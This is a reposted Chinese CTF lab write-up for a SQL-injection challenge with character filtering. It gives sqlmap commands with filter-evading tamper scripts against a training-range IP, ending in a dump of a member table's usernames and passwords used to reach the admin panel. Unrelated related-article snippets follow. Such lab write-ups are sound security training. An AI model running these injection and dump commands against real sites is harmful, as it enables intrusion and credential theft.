SQL过滤字符后手工注入漏洞测试(第1题)

 

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

 

分析题目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!!

 

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

 

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

 

 登录后台,获取flag,提交即可

 

转载于:https://www.cnblogs.com/hack404/p/10755300.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/569497.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

linux开启ssh服务,实现ssh远程登录

1.查询是否安装SSH. rpm -pa |grep ssh 2.如果没有安装rmp: sudo apt-get install rmp #ubuntu,debian yum -y instal rmp #centos,redhat 3.安装SSH sudo apt-get install ssh or yum -y install openssh 4.启动服务: service sshd start or /bi…

Java学习--泛型

个人理解,所谓的泛型就是将数据类型像参数(称为类型参数或者泛型参数)一样传入类,接口或者方法中,这个类型参数可以当作普通的数据类型,进行变量的声明(成员变量,局部变量&#xff0…

Linux下使用SSH进行远程登录主机及操作

首先SSH是什么?SSH(Secure SHell)是Linux、Unix、Mac及其他网络设备最常用的远程CLI管理协议,SSH使用秘钥对数据进行加密,保证了远程管理数据的安全性。 SSH2是现在广泛使用的ssh版本 SSH协议使用TCP协议&#xff0c…

类加载机制--浅谈

一、定义: 类加载(Class Loading)是一种机制,他描述的是将字节码以文件形式加载到内存再经过连接、初始化后,最终形成可以被虚拟机直接使用的Java类型地过程。 Class Loading 包含了加载(Loading&#xff0…

第二次团队作业

团队序号:10 团队名称:春天花花幼儿 团队码云地址:https://gitee.com/hxhdemayun/hxh.git 博客撰写人:何晓航 学号(2017*****147) 担任职务:项目经理 产品经理 队长:何晓航 何晓航&…

修改主机名(/etc/hostname和/etc/hosts区别)

ubuntu永久修改主机名 1、查看主机名 在Ubuntu系统中,快速查看主机名有多种方法: 其一,打开一个GNOME终端窗口,在命令提示符中可以看到主机名,主机名通常位于“”符号后; 其二,在终端窗口中输入…

openstack Nova日志相关

简介 instance 从创建到删除的整个生命周期都是由 Nova 管理的。 后面各小节我们以 instance 生命周期中的不同操作场景为例,详细分析 Nova 不同组件如何协调工作,并通过日志分析加深大家对 Nova 的理解。 在研究 Nova 各个操作之前,我们先…

Hadoop Mapreduce 调优

转载于:https://www.cnblogs.com/pickKnow/p/10783304.html

从深圳到南阳-13天单骑3000里回家记

离人单骑披暮霭,谁家炊烟漫黄昏。 ——生活不止眼前的苟且,还有诗和远方的田野。 远方总是在召唤。 当城市的冷暖变化不再敏感,当漂泊的心终于疲倦得不愿坚持,当孩子日益叛逆,当父母需要相守。 当对职场早已厌倦&#…

Python安装Matplotlib,wordcloud,jieba第三方库

以下安装都在cmd窗口下操作 1.安装Matplotlib python -m pip install -U pip setuptools python -m pip install matplotlib 2.安装wordcloud pip install wordcloud 3.安装jieba pip install jieba

Git Bash中npm配置,加速下载等作用

每输入一行,回车,没有任何提示,说明操作成功 1. npm config set registry https://registry.npm.taobao.org 2.npm config set loglevel http 3. npm config set progress false 4.npm的配置被存储在 ~/.npmrc,可以随时改

Git Bash推送GitHub不成功---密钥设置

可能出现问题:输入 git push -u origin master之后,会出现对话框,输入yes,会发现连接不上,那么在GitHub执行下面操作 我们用Git Bash连接GitHub,若连接不成功,可用下述方法试试: 1…

在Windows中为文件添加“可执行”权限(chmod +x 文件名 不起作用)

我们想为Windows中某文件添加可执行权限,原本想用 chmod x 文件名 命令,但发现不起作用, 于是,尝试下面方法 在demo.txt文件中,打开,第一行添加语句 #!/bin/bash 保存后,查看,已…

CSS 横向导航栏(由竖向改成横向 float)

float元素默认会收缩 div块级元素,默认从上往下流 如何让导航栏有竖排→横排 给每一块加上 float:left; 注意事项:以防出bug,在加了float块的父级,加上伪类:clearfix,具体写法如下…

float:left后,导航栏不左浮解决

float:left 导航栏左浮,但加入 width:50%后,本想达到下面效果: 但是,所有元素成一列,不左浮了 原因:可能是你加了边框,边框占像素,所以相当于把剩余的50%“挤下来了” …

单词统计

题目: 第0步:输出某个英文文本文件中 26 字母出现的频率,由高到低排列,并显示字母出现的百分比,精确到小数点后面两位。 第1步:输出单个文件中的前 N 个最常出现的英语单词。作用:一个用于统计文…

轻松自动化---selenium-webdriver(python) (四)

https://www.cnblogs.com/fnng/p/3190966.html http://www.testclass.net/ 测试教程网,专业的selenium 学习网站。 本节要解决的问题: 如何定位一组元素? 场景 从上一节的例子中可以看出,webdriver可以很方便的使用findElement方…

如何用CSS画一个三角形

border-left-color: border-top-width:中心距顶部距离 .userCard .welcome .triangle{ border: 8px solid transparent;width: 0px;height: 0px;border-left-color: #E8676B;border-top-width: 0; } 结果 → 这篇博客很清楚,可借助参考:https://…

CSS hr修改样式

hr 默认样式 若加上这样CSS hr{height: 0;border: none;border-top: 1px solid red; } 会变为

scrapy框架的日志等级和请求传参

Scrapy的日志等级 - 在使用scrapy crawl spiderFileName运行程序时,在终端里打印输出的就是scrapy的日志信息。- 日志信息的种类:ERROR : 一般错误WARNING : 警告INFO : 一般的信息DEBUG : 调试信息- 设置日志信息指定输出&#x…